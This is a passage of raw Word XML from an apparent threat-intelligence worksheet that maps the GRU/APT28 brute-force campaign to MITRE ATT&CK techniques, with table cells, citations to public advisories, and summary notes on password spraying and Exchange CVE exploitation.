                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F615709" w14:textId="77777777" w:rsidR="00F92B92" w:rsidRPr="00B857D7" w:rsidRDefault="00F92B92" w:rsidP="00962639">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08" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1454CAAA" w14:textId="77777777" w:rsidR="00F92B92" w:rsidRPr="00B857D7" w:rsidRDefault="00F92B92" w:rsidP="00962639">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13EF9FCC" w14:textId="21401520" w:rsidR="00F92B92" w:rsidRPr="00B857D7" w:rsidRDefault="00F92B92" w:rsidP="00962639">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6AD205E3" w14:textId="77777777" w:rsidR="00F92B92" w:rsidRPr="00B857D7" w:rsidRDefault="00F92B92" w:rsidP="00962639">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1638B8D3" w14:textId="77777777" w:rsidR="00F92B92" w:rsidRDefault="00F92B92" w:rsidP="00962639">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="191724BC" w14:textId="77777777" w:rsidR="00F92B92" w:rsidRPr="00B857D7" w:rsidRDefault="00F92B92" w:rsidP="00962639">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27E90EF9" w14:textId="726899C9" w:rsidR="00F92B92" w:rsidRPr="00105B0A" w:rsidRDefault="00F92B92" w:rsidP="00962639">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Added to tidy Markov transition matrix</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00632139" w:rsidRPr="00ED5880" w14:paraId="55B6FA5D" w14:textId="77777777" w:rsidTr="00151FAB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12E89FC7" w14:textId="77777777" w:rsidR="00632139" w:rsidRPr="00F808AD" w:rsidRDefault="00632139" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0146568F" w14:textId="77777777" w:rsidR="00632139" w:rsidRPr="00F808AD" w:rsidRDefault="00632139" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02736772" w14:textId="77777777" w:rsidR="00632139" w:rsidRPr="00F808AD" w:rsidRDefault="00632139" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20543C6F" w14:textId="77777777" w:rsidR="00632139" w:rsidRPr="00F808AD" w:rsidRDefault="00632139" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A9F4041" w14:textId="77777777" w:rsidR="00632139" w:rsidRPr="00F808AD" w:rsidRDefault="00632139" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A70EB92" w14:textId="77777777" w:rsidR="00632139" w:rsidRPr="00F808AD" w:rsidRDefault="00632139" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="490A1C0D" w14:textId="77777777" w:rsidR="00632139" w:rsidRPr="00F808AD" w:rsidRDefault="00632139" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23E2FAA9" w14:textId="77777777" w:rsidR="00632139" w:rsidRPr="00F808AD" w:rsidRDefault="00632139" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="67AF9ADF" w14:textId="77777777" w:rsidR="00632139" w:rsidRPr="0077286F" w:rsidRDefault="00632139" w:rsidP="00632139"/>
    <w:p w14:paraId="56D55C17" w14:textId="5A01DBC8" w:rsidR="00632139" w:rsidRDefault="00632139" w:rsidP="00632139">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>[1]</w:t>
      </w:r>
      <w:r w:rsidR="00D71771">
        <w:t xml:space="preserve"> T1133/T1078</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId34" w:history="1">
        <w:r w:rsidR="004C06A4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF (defense.gov)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004C06A4" w:rsidRPr="005A6AAC">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments  </w:t>
      </w:r>
      <w:r w:rsidRPr="00227A6C">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>[20</w:t>
      </w:r>
      <w:r w:rsidR="004C06A4">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>21</w:t>
      </w:r>
      <w:r w:rsidRPr="00227A6C">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B47EEAF" w14:textId="7E601E25" w:rsidR="005A6AAC" w:rsidRDefault="005A6AAC" w:rsidP="00632139">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">[2] </w:t>
      </w:r>
      <w:hyperlink r:id="rId35" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>STRONTIUM: Detecting new patterns in credential harvesting - Microsoft Security Blog</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005A6AAC">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D71771">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D71771" w:rsidRPr="00D71771">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">From [1] </w:t>
      </w:r>
      <w:r w:rsidRPr="005A6AAC">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>[2020]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48716701" w14:textId="2A8125F7" w:rsidR="00D71771" w:rsidRDefault="00D71771" w:rsidP="00632139">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">[3] T1078 – </w:t>
      </w:r>
      <w:hyperlink r:id="rId36" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Two Years of Pawn Storm Examining an Increasingly Relevant Threat (trendmicro.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003B0F6F">
        <w:t>[2017]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2678F0A4" w14:textId="63417417" w:rsidR="00D71771" w:rsidRDefault="00D71771" w:rsidP="00632139">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">[4] T1078 - </w:t>
      </w:r>
      <w:hyperlink r:id="rId37" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Indictment (justice.gov)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="003B0F6F">
        <w:t xml:space="preserve"> [2018]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A5A40D" w14:textId="27B234EA" w:rsidR="00D71771" w:rsidRDefault="00D71771" w:rsidP="00632139">
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">[5] T1078 - </w:t>
      </w:r>
      <w:hyperlink r:id="rId38" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Corporate IoT – a path to intrusion – Microsoft Security Response </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Center</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003B0F6F">
        <w:t xml:space="preserve"> [2019]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11682375" w14:textId="284A5C7B" w:rsidR="003B0F6F" w:rsidRDefault="003B0F6F" w:rsidP="00632139">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[6] </w:t>
      </w:r>
      <w:hyperlink r:id="rId39" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">APT28, IRON TWILIGHT, SNAKEMACKEREL, Swallowtail, Group 74, </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Sednit</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">, </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Sofacy</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>, Pawn Storm, Fancy Bear, STRONTIUM, Tsar Team, Threat Group-4127, TG-4127, Group G0007 | MITRE ATT&amp;CK®</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="47CA998C" w14:textId="47F6DA7A" w:rsidR="00A22017" w:rsidRDefault="00A22017" w:rsidP="00632139">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A22017">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>[7]</w:t>
      </w:r>
      <w:r w:rsidRPr="00A22017">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId40" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">GitHub - </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>mandiant</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>iocs</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>: FireEye Publicly Shared Indicators of Compromise (IOCs)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="64285A14" w14:textId="4BBD8AED" w:rsidR="0063398E" w:rsidRDefault="0063398E" w:rsidP="00632139">
      <w:r w:rsidRPr="007366F4">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>[8]</w:t>
      </w:r>
      <w:r w:rsidRPr="007366F4">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId41" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>reGeorg</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> (Malware Family) (fraunhofer.de)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>( via</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> search on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reGeorg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41877FDD" w14:textId="6A8E8810" w:rsidR="007366F4" w:rsidRDefault="007366F4" w:rsidP="00632139">
      <w:r>
        <w:t xml:space="preserve">[9] </w:t>
      </w:r>
      <w:hyperlink r:id="rId42" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>NSA: Russian GRU hackers use Kubernetes to run brute force attacks (bleepingcomputer.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00F52709">
        <w:t xml:space="preserve"> [2021]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7906AC5E" w14:textId="4260F9A2" w:rsidR="001D45C9" w:rsidRDefault="001D45C9" w:rsidP="00632139">
      <w:r>
        <w:t xml:space="preserve">[10] </w:t>
      </w:r>
      <w:hyperlink r:id="rId43" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Black Hat Europe 2014 | Arsenal</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>regeorg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> info [2014]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBED825" w14:textId="77777777" w:rsidR="007366F4" w:rsidRDefault="007366F4" w:rsidP="00632139">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D69C38B" w14:textId="556DBBB1" w:rsidR="00632139" w:rsidRDefault="00632139" w:rsidP="00632139"/>
    <w:p w14:paraId="6DC65219" w14:textId="0277FD74" w:rsidR="005A6AAC" w:rsidRDefault="005A6AAC" w:rsidP="005A6AAC">
      <w:r>
        <w:t xml:space="preserve">[1] This brute force capability allows the 85th </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GTsSS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> actors to access protected </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>data,including</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> email, and identify valid account credentials. Those credentials may then be used for a variety of purposes, including initial access, persistence, privilege escalation, and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> evasion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5043013D" w14:textId="1441313C" w:rsidR="00D81EFA" w:rsidRPr="00632139" w:rsidRDefault="00D81EFA" w:rsidP="005A6AAC">
      <w:r>
        <w:t xml:space="preserve">[6] </w:t>
      </w:r>
      <w:r w:rsidRPr="00D81EFA">
        <w:t>APT28 has used Tor and a variety of commercial VPN services to route brute force authentication attempts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3167D5F3" w14:textId="493491BD" w:rsidR="000A406B" w:rsidRDefault="000A406B" w:rsidP="00F006C6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F0A03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">T1110 Brute Force -&gt; T1133 External Remote Services </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C7E245" w14:textId="42612E53" w:rsidR="00155B94" w:rsidRDefault="00155B94" w:rsidP="00F006C6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4649528E" w14:textId="3E3059ED" w:rsidR="00155B94" w:rsidRPr="004F0A03" w:rsidRDefault="00155B94" w:rsidP="00F006C6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A4FB824" w14:textId="2FB2E20D" w:rsidR="000A406B" w:rsidRPr="004F0A03" w:rsidRDefault="000A406B" w:rsidP="00F006C6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F0A03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1078.004 Valid Accounts: Cloud Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011B2069" w14:textId="5BB04018" w:rsidR="00A365EB" w:rsidRDefault="00F006C6" w:rsidP="00A365EB">
      <w:r>
        <w:t>Including reference to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1397C9A4" w14:textId="1AF8BF64" w:rsidR="00F006C6" w:rsidRDefault="00691E0D" w:rsidP="0016230F">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:hyperlink r:id="rId44" w:history="1">
        <w:r w:rsidR="00F006C6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>STRONTIUM: Detecting new patterns in credential harvesting - Microsoft Security Blog</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="30B100F2" w14:textId="4B0D7538" w:rsidR="00610200" w:rsidRPr="00610200" w:rsidRDefault="00610200" w:rsidP="00610200">
      <w:r w:rsidRPr="00610200">
        <w:t xml:space="preserve">Since at least mid-2019 through early 2021, Russian General Staff Main Intelligence Directorate (GRU) 85th Main Special Service </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00610200">
        <w:t>Center</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00610200">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00610200">
        <w:t>GTsSS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00610200">
        <w:t xml:space="preserve">), military unit 26165, used a Kubernetes® cluster to conduct widespread, distributed, and anonymized brute force access attempts against hundreds of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00610200">
        <w:t>government</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00610200">
        <w:t xml:space="preserve"> and private sector targets worldwide.</w:t>
      </w:r>
      <w:r w:rsidR="003E2042">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="003E2042">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="003E2042" w:rsidRPr="003E2042">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1110.003</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="003E2042" w:rsidRPr="003E2042">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Password Spraying</w:t>
      </w:r>
      <w:r w:rsidR="003E2042">
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2836895F" w14:textId="532E4244" w:rsidR="004F0A03" w:rsidRPr="004F0A03" w:rsidRDefault="004F0A03" w:rsidP="00610200">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F0A03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">T1110 Brute Force -&gt; T1133 External Remote Services </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F40BFA0" w14:textId="77777777" w:rsidR="004F0A03" w:rsidRPr="004F0A03" w:rsidRDefault="004F0A03" w:rsidP="004F0A03">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F0A03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1078.004 Valid Accounts: Cloud Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC4A882" w14:textId="0BD966D8" w:rsidR="00610200" w:rsidRPr="00610200" w:rsidRDefault="00610200" w:rsidP="00610200">
      <w:r>
        <w:t>The actors have used identified account credentials in conjunction with exploiting publicly known vulnerabilities, such as exploiting Microsoft Exchange servers using CVE 2020-0688 and CVE 2020-17144, for remote code execution and further access to target networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D30DEF" w14:textId="0756B8D4" w:rsidR="00F006C6" w:rsidRDefault="00AA060F" w:rsidP="00AA060F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F0A03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1190 - Exploitation of Public Facing Applications (CVE-2020-0688, CVE-2020-17144)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217E90BA" w14:textId="5FF6B136" w:rsidR="00445E1A" w:rsidRDefault="00445E1A" w:rsidP="00AA060F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7020AAA5" w14:textId="2EA51138" w:rsidR="00445E1A" w:rsidRDefault="00445E1A" w:rsidP="00445E1A">
      <w:r w:rsidRPr="00445E1A">
        <w:t xml:space="preserve">The actors used a modified and obfuscated version of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00445E1A">
        <w:t>reGeorg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
